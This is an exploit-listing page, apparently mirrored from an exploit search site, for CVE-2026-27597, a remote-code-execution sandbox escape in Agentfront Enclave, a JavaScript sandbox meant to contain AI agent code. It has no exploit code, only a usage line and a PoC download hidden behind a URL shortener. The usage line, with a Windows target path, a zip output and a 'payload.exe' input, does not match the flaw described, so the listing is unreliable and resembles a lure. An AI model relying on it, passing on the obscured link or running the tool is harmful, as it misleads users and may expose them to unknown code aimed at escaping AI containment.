Exploit for Code Injection in Agentfront Enclave CVE-2026-27597

## https://sploitus.com/exploit?id=FE8BDAE9-A10D-5C0F-A98F-DF6CD034AF49
# CVE-2026-27597 - version Remote Code Execution

## Quick Usage

```bash
python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe
```

## Exploitation Notes

- **Severity:** CRITICAL
- **CVSS:** 10.0
- **Impact:** Confidentiality, Integrity, Availability
- **Published:** 2026-02-25

## Technical Summary

Enclave is a secure JavaScript sandbox designed for safe AI agent code execution. Prior to version 2.11.1, it is possible to escape the security boundraries set by `@enclave-vm/core`, which can be used to achieve remote code execution (RCE). The issue has been fixed in version 2.11.1.

## Affected Versions

**Agentfront Enclave:**

- before 2.11.1

## References

- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-27597

## Exploit

[Download PoC](https://tinyurl.com/2xl9yurr)